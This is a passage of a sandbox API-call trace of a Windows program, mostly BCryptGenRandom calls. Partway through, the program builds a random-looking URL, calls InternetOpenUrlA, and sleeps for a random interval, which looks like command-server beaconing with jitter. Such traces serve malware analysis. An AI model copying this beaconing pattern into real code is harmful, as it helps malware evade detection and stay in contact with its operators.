(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b73b, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a1b73b) returned 0x0 [0261.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.036] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.036] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.036] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.040] GetProcessHeap () returned 0x440000 [0262.040] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0262.040] lstrcpyA (in: lpString1=0x473770, lpString2=" ·¡\x03" | out: lpString1=" ·¡\x03") returned=" ·¡\x03" [0262.040] lstrcatA (in: lpString1=" ·¡\x03", lpString2="/de9fjcjyurAqhrrxvzYk8i77y/vrt9ki2hfvu3cr6wi2apfzdV7gEquqgskgK1jsmuzC7/" | out: lpString1=" ·¡\x03/de9fjcjyurAqhrrxvzYk8i77y/vrt9ki2hfvu3cr6wi2apfzdV7gEquqgskgK1jsmuzC7/") returned=" ·¡\x03/de9fjcjyurAqhrrxvzYk8i77y/vrt9ki2hfvu3cr6wi2apfzdV7gEquqgskgK1jsmuzC7/" [0262.040] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0262.040] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl=" ·¡\x03/de9fjcjyurAqhrrxvzYk8i77y/vrt9ki2hfvu3cr6wi2apfzdV7gEquqgskgK1jsmuzC7/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0262.040] GetProcessHeap () returned 0x440000 [0262.040] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0262.040] GetProcessHeap () returned 0x440000 [0262.041] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b720 | out: hHeap=0x440000) returned 1 [0262.041] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0262.041] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0262.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0262.042] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0262.042] Sleep (dwMilliseconds=0x1a8ed) [0262.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0262.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.170] GetProcessHeap () returned 0x440000 [0262.170] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02350 [0262.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02351, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a02351) returned 0x0 [0262.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02373, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a02373) returned 0x0 [0262.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.181] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.182] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.183] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.184] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, 